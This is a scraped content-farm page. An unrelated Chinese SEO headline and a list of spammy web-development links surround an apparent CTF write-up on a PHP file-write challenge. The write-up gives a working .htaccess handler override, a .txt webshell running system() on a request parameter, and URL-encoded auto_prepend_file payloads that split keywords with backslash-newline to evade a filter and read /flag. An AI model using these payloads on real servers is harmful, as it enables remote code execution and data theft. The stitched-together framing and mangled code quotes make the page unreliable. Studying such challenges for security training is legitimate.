当前位置: 首页 > news >正文

网站备案主体更换溧阳 招网站开发兼职

news 2026/4/27 16:39:57
网站备案主体更换,溧阳 招网站开发兼职,新华网两学一做专题网站,滁州网站建设hi444进入靶场 ?php// 使用 scandir 函数扫描当前目录#xff08;即脚本所在目录#xff09;下的所有文件和文件夹// 该函数会返回一个包含目录下所有文件和文件夹名称的数组$files scandir(./); // 遍历扫描得到的文件和文件夹名称数组foreach($files as $file) {// 使用 …进入靶场  ?php// 使用 scandir 函数扫描当前目录即脚本所在目录下的所有文件和文件夹// 该函数会返回一个包含目录下所有文件和文件夹名称的数组$files scandir(./); // 遍历扫描得到的文件和文件夹名称数组foreach($files as $file) {// 使用 is_file 函数检查当前遍历到的元素是否为一个文件if(is_file($file)){// 检查当前文件是否不是 index.phpif ($file ! index.php) {// 如果不是 index.php则使用 unlink 函数删除该文件unlink($file);}}}// 检查 GET 请求中是否缺少 content 或 filename 参数if(!isset($_GET[content]) || !isset($_GET[filename])) {// 如果缺少参数使用 highlight_file 函数高亮显示当前脚本文件的源代码highlight_file(__FILE__);// 终止脚本执行die();}// 从 GET 请求中获取 content 参数的值并赋值给 $content 变量$content $_GET[content];// 使用 stristr 函数检查 $content 中是否包含特定的敏感关键词// stristr 函数用于不区分大小写地查找字符串在另一个字符串中首次出现的位置if(stristr($content,on) || stristr($content,html) || stristr($content,type) || stristr($content,flag) || stristr($content,upload) || stristr($content,file)) {// 如果包含敏感关键词输出 Hacker 提示信息echo Hacker;// 终止脚本执行die();}// 从 GET 请求中获取 filename 参数的值并赋值给 $filename 变量$filename $_GET[filename];// 使用 preg_match 函数检查 $filename 是否包含除小写字母和点号之外的字符// 正则表达式 /[^a-z\.]/ 表示匹配除小写字母和点号之外的任意字符if(preg_match(/[^a-z\.]/, $filename) 1) {// 如果包含非法字符输出 Hacker 提示信息echo Hacker;// 终止脚本执行die();}// 再次扫描当前目录下的所有文件和文件夹// 这一步重复前面的文件删除操作确保在处理新文件之前目录中除了 index.php 没有其他文件$files scandir(./); foreach($files as $file) {if(is_file($file)){if ($file ! index.php) {unlink($file);}}}// 使用 file_put_contents 函数将 $content 的内容追加 Hello, world 后写入指定的文件// 若文件不存在会创建该文件若存在则会覆盖原有内容file_put_contents($filename, $content . \nHello, world); ? 这段 PHP 代码的主要功能是先删除当前目录下除 index.php 之外的所有文件然后检查 GET 请求中是否包含 content 和 filename 参数。如果参数存在会进一步检查 content 中是否包含敏感关键词以及 filename 是否包含非法字符。若都通过检查会再次删除当前目录下除 index.php 之外的所有文件最后将 content 内容追加 Hello, world 后写入指定的文件。 需要上传两个文件一个.txt文件执行命令一个.htaccess文件解析.txt文件 .htaccess FilesMatch \.txt$SetHandler application/x-httpd-php /FilesMatch .txt ?php if(isset($_REQUEST[cmd])){system($_REQUEST[cmd]); } ? ?filename.htaccesscontentphp_value%20auto_prepend_fil%5C%0Ae%20.htaccess%0A%23%3C%3Fphp%20system(cat%20/fla?)%3B%3F%3E%5C ?contentphp_value auto_prepend_fi\%0ale .htaccess%0a%23?php system(cat /flag)?\filename.htaccess
http://www.hkea.cn/news/14437164/

相关文章:

  • 网站 正在建设中idc数据中心排名
  • 网站开发的知识西安学校网站建设哪家专业
  • 什么软件做网站做好怎样下载上海发布
  • 哈尔滨市做网站公司wordpress加载js代码
  • 做网站好的书河北建筑工程网
  • 建设电影网站论文设计师培训多少钱
  • 网站内容规划流程德勤管理咨询
  • 手机软件开发和网站开发做购物网站之前做些什么
  • 定制网站开发哪家好网络游戏名字大全
  • 做动画 的 网站有哪些软件网页开发工具软件有哪些
  • 如何注册申请chn网站北京房产网最新楼盘
  • 简述电子商务网站建设的基本要求6深圳企业网站建设服务公司
  • 广州优秀网站设计怎么建设html网站
  • 描述网站建设的基本流程专业定制网站企业
  • 龙之向导外贸网站淘宝购物平台
  • 自建设网站公司网站建设专家
  • 表示商业网站的域名阿里云网站方案建设书
  • 上海做网站哪个好城乡建设部网站自助商品房
  • 新媒体做图网站用文本文档做网站
  • 绿色网站模板wordpress 邮件通知 密码
  • 通过ip直连打开网站要怎么做广州app制作公司
  • 电信专线可以做网站吗湖南3合1网站建设
  • 网站开发包括网站的等过程做网站建设网站制作
  • 甘州区住房和城乡建设局网站wordpress格子主题
  • 最好的企业网站源码微信公众号入口
  • 三栏式布局的网站有哪些网页设计大赛策划案的背景
  • 公司网站页面设计图片怎么自己做网址
  • 做淘宝客的网站怎么备案网站只能在vps里打开
  • 知名的网站开发公司网站做动态还是静态
  • 响应式网站布局实例企业网站的网址通常包括